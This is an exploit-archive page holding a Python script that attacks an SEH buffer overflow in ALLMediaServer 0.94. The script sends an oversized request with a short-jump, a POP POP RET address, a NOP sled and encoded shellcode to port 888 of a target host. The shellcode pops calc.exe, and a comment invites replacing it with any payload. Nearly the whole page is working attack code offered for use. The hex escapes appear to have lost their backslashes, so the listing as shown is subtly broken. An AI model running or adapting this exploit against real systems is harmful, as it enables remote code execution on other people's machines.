Home / exploits ALLMediaServer 0.94 SEH Overflow
Posted on 08 March 2013
#!/usr/bin/python import socket, sys ############################################################## # Exploit Title: ALLMediaServer 0.94 SEH Overflow Exploit # Date: 07/03/2013 # Exploit Author: metacom # E-mail:metacom27@gmail.com # Software Link:http://allmediaserver.org/download # Version: ALLMediaServer 0.94 # Tested On: Windows 7 German #ALLMediaServer run online mod ############################################################## #"Usage: allmediaserver.py <ip>" host = sys.argv[1] buffer = "http://" + "x41" * 1065 nseh = "xEBx06x90x90" # Short Jump seh = "xCAx24xECx65" #POP POP RET 0x65EC24CA avcodec-53.dll nop = "x90" * 50 #msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00' -e x86/shikata_ga_nai -t c # you can replace the shellcode with any shellcode u want shell = ("xb8x66xa5xa3x41xdbxd5xd9x74x24xf4x5bx33xc9xb1" "x33x31x43x12x83xc3x04x03x25xabx41xb4x55x5bx0c" "x37xa5x9cx6fxb1x40xadxbdxa5x01x9cx71xadx47x2d" "xf9xe3x73xa6x8fx2bx74x0fx25x0axbbx90x8bx92x17" "x52x8dx6ex65x87x6dx4exa6xdax6cx97xdax15x3cx40" "x91x84xd1xe5xe7x14xd3x29x6cx24xabx4cxb2xd1x01" "x4exe2x4ax1dx18x1axe0x79xb9x1bx25x9ax85x52x42" "x69x7dx65x82xa3x7ex54xeax68x41x59xe7x71x85x5d" "x18x04xfdx9exa5x1fxc6xddx71x95xdbx45xf1x0dx38" "x74xd6xc8xcbx7ax93x9fx94x9ex22x73xafx9axafx72" "x60x2bxebx50xa4x70xafxf9xfdxdcx1ex05x1dxb8xff" "xa3x55x2axebxd2x37x20xeax57x42x0dxecx67x4dx3d" "x85x56xc6xd2xd2x66x0dx97x2dx2dx0cxb1xa5xe8xc4" "x80xabx0ax33xc6xd5x88xb6xb6x21x90xb2xb3x6ex16" "x2exc9xffxf3x50x7exffxd1x32xe1x93xbax9ax84x13" "x58xe3") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 888)) #default port s.send(buffer+nseh+seh+nop+shell) print "Exploit sent! Open Calc :) " s.close()
